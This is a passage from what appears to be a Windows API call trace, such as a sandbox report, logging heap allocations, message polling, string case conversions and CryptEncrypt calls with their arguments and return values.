dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0256.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0256.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0256.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0256.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0256.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0256.477] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0256.477] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x24a9ee8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0256.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0256.478] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0256.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0256.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0256.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0256.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0256.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0256.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0256.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0256.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0256.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0256.478] CryptEncrypt (in: hKey=0xaa5820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x2c40, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x2c48) returned 1 [0256.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0256.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0256.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0256.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0256.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0256.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0256.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0256.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0256.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0256.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0256.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0256.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0256.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0256.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0256.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0256.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0256.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0256.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0256.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0256.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0256.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0256.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0256.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0256.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0256.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0256.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0256.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0256.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0256.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0256.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0256.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0256.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0256.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0256.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0256.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0256.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0256.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0256.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0256.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0256.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0256.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0256.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0256.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0256.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0256.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0256.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0256.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0256.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0256.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0256.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0256.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0256.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0256.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0256.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0256.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0256.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0256.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0256.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0256.482] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0256.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0256.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0256.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0256.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0256.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0256.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0256.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0256.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0256.482] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.482] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0256.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0256.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0256.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0256.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0256.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0256.483] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0256.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0256.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0256.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0256.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0256.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0256.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0256.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0256.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0256.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0256.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0256.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0256.483] CharLowerBuffW (in: lpsz="byte[11336]", cchLength=0xb | out: lpsz="byte[11336]") returned 0xb [0256.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0256.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0256.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0256.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0256.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0256.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0256.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0256.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0256.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0256.483] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0256.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0256.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0256.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0256.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0256.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0256.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0256.484] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0256.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0256.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0256.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0256.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0256.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0256.484] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0256.484] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0256.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0256.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0256.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0256.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0256.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0256.484] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0256.485] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.485] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0256.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0256.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0256.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0256.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0256.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0256.486] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0256.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0256.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0256.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0256.486] CryptEncrypt (in: hKey=0xaa5820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3573c60*, pdwDataLen=0x8bef68*=0x2c40, dwBufLen=0x2c48 | out: pbData=0x3573c60*, pdwDataLen=0x8bef68*=0x2c48) returned 1 [0256.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0256.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0256.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0256.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0256.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0256.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0256.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0256.487] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0256.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0256.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0256.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0256.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0256.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0256.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0256.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0256.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0256.487] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.487] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0256.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0256.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0256.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0256.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0256.488] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0256.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0256.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0256.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0256.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0256.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0256.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0256.489] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0256.489] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0256.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0256.489] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0256.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0256.489] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0256.489] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0256.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0256.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0256.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0256.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0256.489] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0256.489] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.489] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0256.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0256.489] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0256.489] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0256.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0256.490] RtlAllocateHeap (HeapHandle=0x25c0000, 